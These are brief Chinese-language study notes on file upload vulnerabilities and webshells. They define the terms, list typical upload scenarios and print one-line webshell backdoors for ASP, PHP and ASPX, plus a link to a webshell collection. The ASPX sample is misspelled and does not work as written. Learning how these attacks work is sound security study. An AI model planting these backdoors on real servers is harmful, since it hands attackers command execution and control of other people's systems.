什么是文件上传漏洞?
即 用户可上传一个可执行的脚本文件,如webshell等恶意脚本,可获得执行服务器端命令的能力。
文件上传漏洞利用之webshell
- webshell:网页后门或以php、jsp、asp、aspx等网页文件存在的命令执行环境来取得服务器的控制权
web:服务器开放的服务;shell:取得服务器的操作权限 - webshell用途:1)网站管理、服务器管理;2)入侵/攻击网站服务器
- 一句话木马
asp <%execute(request("pass"))%> php <?php @eval($_POST[pass])?> aspx <%@ Page languague="Jscript"%><%Request.Item["pass"]%>
- webshell下载地址:https://github.com/lilei9341/webshell/tree/master/jsp
文件上传漏洞常见场景
- 图片、文档文件的上传
- 特殊之网站的数据库备份
- 特殊之网站配置插入木马
- 特殊之修改页面为添加脚本
- 特殊之网站类型/文本编辑新增上传脚本类型
- 特殊之数据库上传文件命令